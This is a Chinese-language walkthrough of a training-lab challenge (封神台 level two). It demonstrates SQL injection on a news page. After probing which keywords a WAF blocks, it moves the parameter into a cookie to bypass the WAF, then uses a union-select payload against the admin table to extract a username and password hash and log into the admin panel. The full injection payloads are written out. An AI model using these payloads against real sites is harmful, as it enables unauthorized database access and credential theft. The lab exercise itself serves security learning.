封神台第二关

点击传送门

来到目标公司网站

可以看到有很多的网页

现在我们需要寻找注入点,注入点存在的页面一般可以明显的显示出正确页面和错误页面

这里可以看到有新闻页面

有新闻的一般选择新闻页面

我们点击第一个新闻

进来后可以看到

URL为

http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171

开始试探

(1)判断waf拦截的关键字

'触发waf

and触发waf

or触发waf

select触发waf

union order by不会触发waf

--+不能被数据库识别,要使用#

(2)联合查询注入尝试

得到注入点数量,构建联合查询语句

?id=171 union select 1,2,3,4,5,6,7,8,9,10#

利用SQL绕过手法使得select可用

试图转码绕过失败

试图利用/**/和/*!*/绕过失败

放弃联合查询

(3)cookies绕过尝试

尝试cookies绕过

直接访问http://g8wepfcp.ia.aqlab.cn/shownews.asp

利用bp抓包,将原cookies值

Cookie: ASPSESSIONIDACQTQQAS=OKOJFAODPDJCCFEKBAECGJDK

改为

Cookie: id=171

访问网页,发现访问的页面正常输出,cookies可以当值来用

将值改为联合查询语句

并猜测表admin的存在性

Cookie: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

页面返回正常,说明admin表存在

且页面返回的字段有2,3,7,8,9

这时可以将注入点2,3,7,8,9替换为字段名,用这种方式来猜测字段的存在,并体现返回值

Cookie: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

页面返回

username:admin

password:b9a2a2b5dffb918c

利用bp解码后

password为welcome

利用御剑后台扫描工具

得到后台网站

http://g8wepfcp.ia.aqlab.cn/admin/Login.asp

输入账户密码

成功通过

相关推荐
tntxia16 小时前
网络安全漏洞修复(一)
安全
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月1 天前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端
用户3169353811831 天前
MySQL服务无法启动问题解决全记录
数据库
vivo互联网技术2 天前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
倔强的石头_2 天前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库